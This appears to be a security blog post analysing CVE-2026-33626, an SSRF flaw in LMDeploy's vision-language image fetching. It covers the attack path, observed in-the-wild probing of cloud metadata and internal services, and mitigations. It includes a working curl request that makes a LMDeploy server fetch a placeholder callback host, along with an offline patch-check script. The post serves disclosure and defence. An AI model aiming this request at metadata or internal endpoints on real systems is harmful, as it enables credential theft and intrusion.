CVE-2026-33626 and the LMDeploy Vision-Language SSRF Exposure
- ninp0

- 3 days ago
ABSTRACT
CVE-2026-33626 affects LMDeploy versions before 0.12.3. NVD scores it CVSS 7.5 High, but the real-world impact is amplified by context: a vulnerable vision-language endpoint can be turned into a server-side HTTP client that reaches cloud metadata services, loopback-only databases, internal admin panels, and out-of-band callback infrastructure. Sysdig observed exploitation only 12 hours and 31 minutes after the GitHub advisory page went live.
EXECUTIVE SUMMARY
LMDeploy is an OpenAI-compatible serving stack for large language models and vision-language models. In vulnerable releases, user-controlled image_url values are fetched without sufficient hostname and IP safety checks. A remote attacker can therefore coerce the model server into issuing HTTP requests to attacker-chosen destinations, including link-local, loopback, and RFC 1918 addresses, as well as hostnames whose DNS answers mix public and internal addresses.
NVD describes the flaw as a server-side request forgery in LMDeploy’s vision-language module and lists CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N for a 7.5 High rating. GitHub’s advisory explains the root cause in the load_image() path and includes a proof-of-concept section. Sysdig’s follow-on research shows why defenders should treat this as more than a theoretical SSRF: the first observed attacker session probed AWS IMDS, Redis on 6379, MySQL on 3306, a secondary HTTP admin surface on 8080, and a blind-SSRF callback domain.
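The destination classes named above can be told apart with Python's standard ipaddress module. The following is a minimal sketch for illustration only; the helper name classify_destination is hypothetical and is not taken from LMDeploy or its patch.

```python
import ipaddress


def classify_destination(ip_text: str) -> str:
    """Return a coarse label for a literal IP address (hypothetical helper)."""
    ip = ipaddress.ip_address(ip_text)
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"
    # is_private covers the RFC 1918 ranges plus other reserved blocks.
    if ip.is_private:
        return "private"
    return "public"


# Addresses of the kinds an SSRF probe typically targets, plus one public address.
for addr in ("127.0.0.1", "169.254.169.254", "10.0.0.5", "::1", "8.8.8.8"):
    print(addr, classify_destination(addr))
```

The order of the checks matters: link-local addresses such as 169.254.169.254 also count as private in the ipaddress module, so the more specific label is tested first.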
AFFECTED CONDITIONS
LMDeploy versions prior to 0.12.3 are affected according to NVD and the GitHub security advisory.
The vulnerable path sits in vision-language request handling, where image_url input can trigger outbound URL fetches on behalf of the server.
The advisory notes that API keys are disabled by default and the server binds to 0.0.0.0 in common deployments, increasing the chance that an exposed instance is reachable from the public internet.
AI-serving environments are especially sensitive because the host often has access to GPU nodes, object storage, internal caches, orchestration APIs, and cloud IAM roles.
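A quick way to apply the version condition above is to compare the installed release against 0.12.3. This is a minimal sketch that assumes plain dotted version strings; the names parse_version and is_affected are hypothetical, and pre-release suffixes such as rc1 are ignored, so treat borderline results with care.

```python
import re
from importlib import metadata

FIXED = (0, 12, 3)  # first fixed release according to NVD and the advisory


def parse_version(version: str) -> tuple:
    """Extract leading numeric components, e.g. '0.12.2' -> (0, 12, 2)."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part or 0) for part in match.groups())


def is_affected(version: str) -> bool:
    """True when the version sorts before the fixed release."""
    return parse_version(version) < FIXED


try:
    installed = metadata.version("lmdeploy")
    print(installed, "affected" if is_affected(installed) else "not affected")
except metadata.PackageNotFoundError:
    print("lmdeploy is not installed in this environment")
```

Run it inside the same virtual environment or container image that serves the model, since the check only sees packages visible to that interpreter.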
ATTACK PATH
The attacker path is straightforward. First, the adversary sends a normal-looking OpenAI-compatible chat request to LMDeploy. Second, they provide an image_url that points at a target the attacker wants the server to fetch. Third, LMDeploy dereferences that URL server-side. If the target is cloud metadata, the server may leak credential material. If the target is a loopback-only service, the attacker gets a yes-or-no signal that the service exists and may retrieve useful protocol banners or error content. If the target is an out-of-band callback domain, the attacker confirms blind SSRF and outbound egress.
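For defenders reviewing captured request bodies, the first two steps can be spotted by pulling image_url values out of the chat payload and flagging those that name an internal IP literal. The sketch below assumes the OpenAI-style message layout used in this article's lab request; both function names are hypothetical, and hostnames are deliberately left unjudged because they need DNS resolution.

```python
import ipaddress
from urllib.parse import urlsplit


def extract_image_urls(payload: dict) -> list:
    """Collect image_url strings from an OpenAI-style chat request body."""
    urls = []
    for message in payload.get("messages", []):
        content = message.get("content")
        if not isinstance(content, list):
            continue  # plain-string content carries no image parts
        for part in content:
            if isinstance(part, dict) and part.get("type") == "image_url":
                image = part.get("image_url")
                if isinstance(image, dict) and isinstance(image.get("url"), str):
                    urls.append(image["url"])
    return urls


def targets_internal_ip_literal(url: str) -> bool:
    """True when the URL host is a loopback, link-local, or private IP literal."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, not a literal; judging it requires resolution
    return ip.is_loopback or ip.is_link_local or ip.is_private


sample = {"messages": [{"role": "user", "content": [
    {"type": "text", "text": "Describe this image."},
    {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/"}},
]}]}
for url in extract_image_urls(sample):
    print(url, targets_internal_ip_literal(url))
```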
Sysdig’s observed attack session adds an important twist: the operator did not stop at metadata probing. They also enumerated /openapi.json and touched LMDeploy’s distributed-serving control plane, including /distserve/p2p_drop_connect, indicating the bug can support follow-on disruption or cluster mapping. In other words, the SSRF can act as both a reconnaissance primitive and a stepping stone to availability impact.
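Requests to those paths can be surfaced from access logs. The sketch below assumes log lines that contain a quoted request line such as "GET /path HTTP/1.1"; the sample lines are invented for illustration and the function name is hypothetical, so adjust the pattern to your server's actual log format.

```python
import re

# Paths named in the observed session: API enumeration and the distserve control plane.
SENSITIVE_PREFIXES = ("/openapi.json", "/distserve/")

# Matches a quoted request line, e.g. "GET /openapi.json HTTP/1.1" (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def flag_sensitive_requests(lines):
    """Return (method, path) pairs for requests that touch sensitive prefixes."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and match.group("path").startswith(SENSITIVE_PREFIXES):
            hits.append((match.group("method"), match.group("path")))
    return hits


# Invented sample lines; real logs will differ.
sample_log = [
    'INFO: 203.0.113.7:51234 - "GET /openapi.json HTTP/1.1" 200 OK',
    'INFO: 203.0.113.7:51240 - "POST /v1/chat/completions HTTP/1.1" 200 OK',
    'INFO: 203.0.113.7:51251 - "POST /distserve/p2p_drop_connect HTTP/1.1" 200 OK',
]
for method, path in flag_sensitive_requests(sample_log):
    print(method, path)
```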
BUSINESS IMPACT
Cloud credential theft: access to AWS (including the ECS task credential endpoint), GCP, Azure, or other metadata endpoints can expose short-lived credentials attached to expensive GPU workloads.
Internal service discovery: loopback or private-network probes can reveal Redis, MySQL, Postgres, Elasticsearch, Docker, or custom admin services that should never be internet reachable.
Inference-stack disruption: attacker awareness of LMDeploy internal control paths increases the risk of denial of service against distributed-serving clusters.
Data exposure: model-serving nodes frequently hold proprietary prompts, customer uploads, model artifacts, and pipeline secrets that are more valuable than the CVSS number alone suggests.
PUBLIC POC AND VALIDATION REFERENCES
Public exploit coverage for this issue is unusual: Sysdig explicitly notes that no standalone public GitHub or exploit-repository PoC was visible when the first attacker hit their honeypot. However, multiple public artifacts now provide concrete proof, reproduction clues, or regression logic defenders can use responsibly:
GitHub Security Advisory GHSA-6w67-hwm5-92mq includes a Proof of Concept section with a callback-server validation flow and a metadata-target example: https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq
Sysdig’s exploitation write-up documents the first observed in-the-wild timeline, exact attacker target patterns, and the OOB callback domain used during probing: https://www.sysdig.com/blog/cve-2026-33626-how-attackers-exploited-lmdeploy-llm-inference-engines-in-12-hours
InternLM pull request #4447 and the associated patch show the remediation logic added for safe URL handling and redirect blocking: https://github.com/InternLM/lmdeploy/pull/4447
The added regression tests in tests/test_lmdeploy/test_vl/test_safe_url.py publicly enumerate blocked cases such as localhost, 169.254.169.254, IPv6 loopback, and mixed-DNS rebinding patterns.
ORIGINAL 0DAY INC LAB-ONLY POC A: CONTROLLED CALLBACK SSRF CHECK
The first 0day Inc PoC is intentionally non-destructive. It uses a lab-controlled callback server and asks a test LMDeploy instance to fetch a benign PNG path from infrastructure you own. If the callback arrives, you have confirmed SSRF behavior without touching cloud metadata or internal production addresses. Use only on systems you own or are explicitly authorized to assess.
# terminal 1: callback listener on a lab-controlled host
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Log each fetch so the callback is visible on the console.
        print(f"[CALLBACK] path={self.path} client={self.client_address} ua={self.headers.get('User-Agent')}")
        self.send_response(200)
        self.send_header("Content-Type", "image/png")
        self.end_headers()
        # Reply with only the PNG signature bytes, which is enough for a canary.
        self.wfile.write(b"\x89PNG\r\n\x1a\n")

HTTPServer(("0.0.0.0", 8889), Handler).serve_forever()
PY
# terminal 2: authorized lab request to LMDeploy
curl -s http://LMDEPLOY_HOST:23333/v1/chat/completions \
  -H "Content-Type: application/json" \
  --data-binary @- <<'JSON'
{
  "model": "internlm-xcomposer2",
  "messages": [{
    "role": "user",
    "content": [
      {"type": "text", "text": "Describe this image."},
      {"type": "image_url", "image_url": {"url": "http://CALLBACK_HOST:8889/lmdeploy-ssrf-canary.png"}}
    ]
  }]
}
JSON
Interpretation: a GET request hitting the callback listener from the LMDeploy host confirms that the model server can be coerced into server-side fetches via image_url. That is enough to justify urgent containment because the same primitive can be repurposed against metadata services or internal admin endpoints by a real attacker.
ORIGINAL 0DAY INC LAB-ONLY POC B: PATCH-PRESENCE TRIAGE SCRIPT
The second 0day Inc PoC is a safe offline triage helper for source trees, containers, or mounted package directories. It does not send any network traffic. Instead, it checks whether the LMDeploy codebase contains the core defensive controls introduced by the public remediation effort.
#!/usr/bin/env python3
"""Offline check for the SSRF guards added by the public LMDeploy fix."""
import pathlib
import sys

if len(sys.argv) != 2:
    sys.exit(f"usage: {sys.argv[0]} /path/to/lmdeploy-root")

root = pathlib.Path(sys.argv[1])
target = root / "lmdeploy" / "vl" / "media" / "connection.py"
# A missing file yields empty text, so every check below reports MISS.
text = target.read_text() if target.exists() else ""

checks = {
    "has_safe_url_guard": "_is_safe_url" in text,
    "uses_getaddrinfo": "getaddrinfo" in text,
    "blocks_link_local": "169.254" in text or "is_link_local" in text,
    # Spaces are stripped so "allow_redirects = False" also matches.
    "blocks_redirects": "allow_redirects=False" in text.replace(" ", ""),
}

for name, ok in checks.items():
    # Single quotes inside the f-string keep this valid on Python versions before 3.12.
    print(f"[{'OK' if ok else 'MISS'}] {name}")

if not all(checks.values()):
    print("Potentially vulnerable or incompletely patched LMDeploy tree detected.")
Interpretation: missing _is_safe_url handling, absent getaddrinfo resolution, missing link-local guards, or lack of redirect suppression should be treated as strong evidence that the runtime is still vulnerable or incompletely patched.
DEFENSIVE IMPLICATIONS
Upgrade immediately to LMDeploy 0.12.3 or later.
Enforce IMDSv2 on AWS-hosted inference nodes so a simple GET-only SSRF cannot harvest credentials from IMDSv1 endpoints.
Restrict outbound egress from AI inference hosts to only the storage, logging, and package sources they truly require.
Alert on outbound access from inference processes to loopback, link-local, and RFC 1918 ranges as well as metadata IPs such as 169.254.169.254 and 169.254.170.2.
Review whether /distserve or other LMDeploy administrative surfaces are internet reachable or unauthenticated in default deployments.
Rotate any cloud credentials, API keys, or service tokens attached to publicly reachable LMDeploy nodes that may have been exposed before patching.
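The IMDSv2 recommendation above rests on the shape of the requests involved: IMDSv2 first requires a PUT to the token endpoint with a TTL header, then a GET that carries the returned token in a header. The sketch below only builds those requests with urllib and sends nothing; the function names are hypothetical. It assumes an image_url fetch issues a plain GET without attacker-controlled headers, which is why such a fetch would not complete the token step.

```python
from urllib.request import Request

IMDS = "http://169.254.169.254"


def build_token_request(ttl_seconds: int = 21600) -> Request:
    """Step 1 of IMDSv2: a PUT that asks for a session token."""
    return Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def build_metadata_request(token: str, path: str = "/latest/meta-data/") -> Request:
    """Step 2 of IMDSv2: a GET that must present the session token."""
    return Request(f"{IMDS}{path}", headers={"X-aws-ec2-metadata-token": token})


token_req = build_token_request()
meta_req = build_metadata_request("EXAMPLE_TOKEN")
print(token_req.get_method(), token_req.full_url)
print(meta_req.get_method(), meta_req.full_url)
```

With IMDSv1 still enabled, the second request works without any token, which is the case a GET-only SSRF can abuse.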
PATCH AND REGRESSION DETAIL
Public patch material is unusually useful here. The lmdeploy pull request and commit history show that remediation added safety checks around URL parsing, DNS resolution, blocked internal address space, and redirect refusal. The associated tests explicitly cover public domains versus loopback, metadata IPs, IPv6 local addresses, and mixed-DNS responses, which is valuable because DNS rebinding is a classic way to bypass naive SSRF allowlists.
That test coverage matters. Many SSRF fixes fail because they validate the original hostname string instead of every resolved address, or because they permit redirects that bounce a safe public URL into a private target. The LMDeploy regression tests added with the patch address both concerns directly.
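The "every resolved address" point can be sketched as follows. This is an illustrative check written for this article, not the code from the LMDeploy patch; the names address_is_public, resolves_only_to_public, and stub_resolver are hypothetical, and the resolver is injectable so the example runs without real DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def address_is_public(ip_text: str) -> bool:
    """True only for globally routable addresses; fail closed on parse errors."""
    try:
        return ipaddress.ip_address(ip_text).is_global
    except ValueError:
        return False


def resolves_only_to_public(url: str, resolver=socket.getaddrinfo) -> bool:
    """Reject the URL unless every resolved address is public."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port
    except ValueError:
        return False  # malformed URL or port
    if parts.scheme not in ("http", "https") or not host:
        return False
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    try:
        infos = resolver(host, port, type=socket.SOCK_STREAM)
    except (OSError, UnicodeError):
        return False  # resolution failure: fail closed
    addresses = {info[4][0] for info in infos}
    # One internal answer among public ones is enough to reject (mixed DNS).
    return bool(addresses) and all(address_is_public(a) for a in addresses)


def stub_resolver(answers):
    """Build a fake getaddrinfo that returns fixed IPv4 answers (test aid)."""
    def resolve(host, port, **kwargs):
        return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port)) for ip in answers]
    return resolve


print(resolves_only_to_public("http://img.example/a.png", stub_resolver(["8.8.8.8"])))
print(resolves_only_to_public("http://img.example/a.png", stub_resolver(["8.8.8.8", "127.0.0.1"])))
```

A check like this only helps if the fetch then connects to the validated address and refuses redirects; otherwise a second DNS lookup or a 302 response can still steer the request to an internal target.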
REFERENCES
The Hacker News coverage: https://thehackernews.com/2026/04/lmdeploy-cve-2026-33626-flaw-exploited.html
NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33626
GitHub Security Advisory GHSA-6w67-hwm5-92mq: https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq
InternLM fix commit 71d64a339edb901e9005358e0633fbbab367d626: https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626
InternLM remediation pull request #4447: https://github.com/InternLM/lmdeploy/pull/4447
InternLM v0.12.3 release: https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3
Sysdig Threat Research Team analysis: https://www.sysdig.com/blog/cve-2026-33626-how-attackers-exploited-lmdeploy-llm-inference-engines-in-12-hours
Bottom line: CVE-2026-33626 is nominally “just” a high-severity SSRF, but in exposed AI-inference deployments it behaves like a fast-moving cloud credential and internal-reconnaissance problem.




